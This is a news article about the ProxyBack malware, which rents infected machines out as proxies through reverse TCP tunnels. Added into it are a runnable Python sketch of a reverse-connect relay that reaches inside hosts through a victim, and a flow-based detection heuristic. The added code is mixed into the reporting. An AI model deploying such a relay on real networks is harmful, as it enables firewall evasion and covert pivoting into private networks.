SecurityWeek

Malware & Threats
Malware Turns Infected Systems Into Proxies

Security researchers at Palo Alto Networks have discovered a new family of malware that secretly turns infected systems into Internet proxies.

Dubbed ProxyBack, the family includes over 20 malware versions and has been observed infecting systems since March 2014, Palo Alto Networks’ Jeff White explains in a blog post. According to the researchers, ProxyBack’s distribution is focused mainly in Europe, and its primary targets appear to be educational institutions.

Proxies are often used to protect one’s privacy on the Internet, but ProxyBack turns that around: it quietly makes the infected system itself a proxy and rents it out as part of a proxy service, a dangerous situation for the owner of the machine. The operators also configured compromised machines so that network traffic flows through them unhindered.

To keep the proxy from being blocked by firewalls or other network-based restrictions, ProxyBack builds a reverse tunnel over TCP to an attacker-controlled proxy server. Because the infected system makes the initial call home, the outbound connection is typically permitted, and the proxy server can then send its traffic back through the tunnel and on to the Internet or to other devices on the victim’s network unrestricted.

In effect, the victim proxy punches a hole in the firewall by establishing a TCP connection to the attacker-controlled proxy server, and the server validates that it can reach the victim proxy and successfully route traffic through it. From that point on the victim is an unwitting participant in routing web traffic to the Internet, the network security firm said.
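The reverse-connect relay described above, reduced to a runnable sketch (an added example written for this page, not ProxyBack’s code or Palo Alto Networks’ analysis): the "victim" makes the single outbound TCP connection, the "operator" accepts it and then names a destination to reach, and the victim opens that inner connection and shuttles bytes in both directions. Everything runs on localhost in threads; the one-line `host:port` command format, the inside-only web server and all addresses are assumptions for illustration.

```python
"""Reverse-connect tunnel relay, simplified for illustration (not ProxyBack's
own protocol). All three parties run on localhost in threads."""
import socket
import threading


def _listen():
    """Bind a TCP listener on an ephemeral localhost port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def _pipe(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _recv_line(sock):
    """Read one newline-terminated command; b'' if the peer went away."""
    line = b""
    while not line.endswith(b"\n"):
        byte = sock.recv(1)
        if not byte:
            return b""
        line += byte
    return line


def inside_server(srv):
    """Stand-in for a host that only the victim can reach (assumed)."""
    conn, _ = srv.accept()
    with conn:
        request = conn.recv(4096)
        first_line = request.split(b"\r\n")[0]
        conn.sendall(b"HTTP/1.0 200 OK\r\n\r\ninside:" + first_line)


def victim(operator_addr):
    """Infected host: one outbound 'call home', then relay on command."""
    tunnel = socket.create_connection(operator_addr)
    cmd = _recv_line(tunnel)                # assumed command format: host:port\n
    if not cmd:
        tunnel.close()
        return
    host, port = cmd.strip().decode().rsplit(":", 1)
    inner = socket.create_connection((host, int(port)))
    up = threading.Thread(target=_pipe, args=(tunnel, inner))
    up.start()                              # operator's request -> inside host
    _pipe(inner, tunnel)                    # inside host's reply -> operator
    up.join()
    inner.close()
    tunnel.close()


def operator(op_srv, target, request):
    """Attacker-side proxy: wait for the victim, then use it to reach target."""
    tunnel, _ = op_srv.accept()
    with tunnel:
        tunnel.sendall(f"{target[0]}:{target[1]}\n".encode())
        tunnel.sendall(request)
        tunnel.shutdown(socket.SHUT_WR)     # done sending; now read the reply
        reply = b""
        while True:
            chunk = tunnel.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


def run_demo():
    """Push one request through the victim to the inside host; return reply."""
    inside, op = _listen(), _listen()
    threading.Thread(target=inside_server, args=(inside,), daemon=True).start()
    threading.Thread(target=victim, args=(op.getsockname(),), daemon=True).start()
    reply = operator(op, inside.getsockname(), b"GET /secret HTTP/1.0\r\n\r\n")
    inside.close()
    op.close()
    return reply


if __name__ == "__main__":
    print(run_demo().decode())
```

Run `run_demo()`: from a perimeter firewall’s point of view the victim shows exactly one outbound connection to the operator, while the request to the inside host originates from the victim’s own address. That is why an allow-all-outbound policy on its own does nothing against this pattern.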

The first step ProxyBack takes when establishing the tunnel is to make a connection to a web server hosting a PHP file that contains a URL to another PHP file on the same server. The second PHP file is used to send commands to the initial web server and grab information to set up the proxy connection.

The server is provided with information that includes the public IP address of the victim proxy and the ID for the victim proxy. The ID is used to keep track of the infected system, and Palo Alto Networks determined that over 11,000 machines could have been compromised to date.

ProxyBack also reports the version of the running malware and the running operating system. The version strings it can send cover Windows 2000 and newer, including Windows Home Server and Windows Server 2003 through Windows Server 2016, which suggests the malware is built to run on all of these platforms. One caveat: the list of versions the reporting code recognizes shows what its authors planned for, not which versions were actually observed infected.

Palo Alto Networks reports a sizable increase in traffic routed through infected systems and notes that ProxyBack is used as a proxy service, but that users’ traffic is neither anonymous nor safe from tampering. Most of the traffic reportedly originates from an automated system creating fake accounts across dating sites such as “farmersonly.com”, “match.com”, “meetme.com”, and “okcupid.com”.
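A detection check a network defender could run against flow records, added here as an example of my own and not something from the page or from Palo Alto Networks’ report: look for the combination of one long-lived outbound connection whose sent volume dwarfs what it receives (the tunnel, carrying fetched pages back to the operator) with many short fetches from distinct web hosts inside that window (the pages fetched on the proxy customers’ behalf). The flow records, the thresholds and the 80/443 port filter are constructed assumptions.

```python
"""Heuristic for a host acting as a reverse-tunnel proxy, evaluated over
constructed NetFlow-style records. Thresholds and ports are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    start: int       # seconds since capture start
    end: int
    bytes_out: int   # src -> dst
    bytes_in: int    # dst -> src


def build_sample_flows():
    """Constructed sample: one relaying victim, one ordinary workstation."""
    flows = []
    # victim: a 2-hour outbound tunnel that mostly SENDS (fetched pages going
    # back to the operator) ...
    flows.append(Flow("10.1.5.23", "203.0.113.10", 8080, 0, 7200, 9_000_000, 300_000))
    # ... and 30 short fetches from distinct web hosts inside that window
    for i in range(30):
        t0 = 100 + i * 200
        flows.append(Flow("10.1.5.23", f"198.51.100.{i + 1}", 443, t0, t0 + 30, 10_000, 300_000))
    # ordinary workstation: a long VPN-like session that mostly RECEIVES,
    # plus a handful of browsing flows
    flows.append(Flow("10.1.5.40", "203.0.113.50", 443, 0, 7200, 400_000, 12_000_000))
    for i in range(5):
        t0 = 300 * i
        flows.append(Flow("10.1.5.40", f"198.51.100.{50 + i}", 443, t0, t0 + 20, 8_000, 250_000))
    return flows


def find_relay_candidates(flows, min_tunnel_s=3600, min_fanout=20, out_in_ratio=3.0):
    """Return (src, tunnel_dst, fanout) for hosts matching the relay pattern:
    a persistent outbound flow sending >= out_in_ratio times what it receives,
    with >= min_fanout distinct web destinations contacted during its lifetime."""
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)

    hits = []
    for src, host_flows in by_src.items():
        for tun in host_flows:
            if tun.end - tun.start < min_tunnel_s:
                continue                                  # not long-lived
            if tun.bytes_out < out_in_ratio * max(tun.bytes_in, 1):
                continue                                  # not send-heavy
            fanout = {
                f.dst for f in host_flows
                if f is not tun and f.dport in (80, 443)
                and f.start >= tun.start and f.end <= tun.end
            }
            if len(fanout) >= min_fanout:
                hits.append((src, tun.dst, len(fanout)))
    return hits


if __name__ == "__main__":
    for src, dst, n in find_relay_candidates(build_sample_flows()):
        print(f"{src}: persistent send-heavy flow to {dst}, {n} web fetches inside it")
```

ProxyBack also relays to other devices on the victim’s network, so in practice widen the port filter beyond 80/443 and include internal destinations. A VPN client produces a similar long-lived flow but in the opposite direction (it mostly receives), which is what the send/receive ratio separates; tune the thresholds to the traffic baseline of the environment.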

Another site in the captures was buyproxy[.]ru, which matched a proxy service the researchers found in their captures; a GET request to http://buyproxy[.]ru/proxy/ was observed less than four hours into the capture. The captures also contained legitimate traffic from benign users of the service, to sites including eBay, Twitter, Craigslist, Facebook, and Wikipedia.

The buyproxy[.]ru website claims to have been in business for over 7 years and to offer private proxy servers that are not in public proxy bases, while also claiming that connections are encrypted and use a “proprietary technology of traffic tunneling.” The researchers found various victim proxies listed on the website, suggesting that, even if the people behind buyproxy[.]ru are not responsible for distributing ProxyBack, the malware is certainly designed for and used in their service.
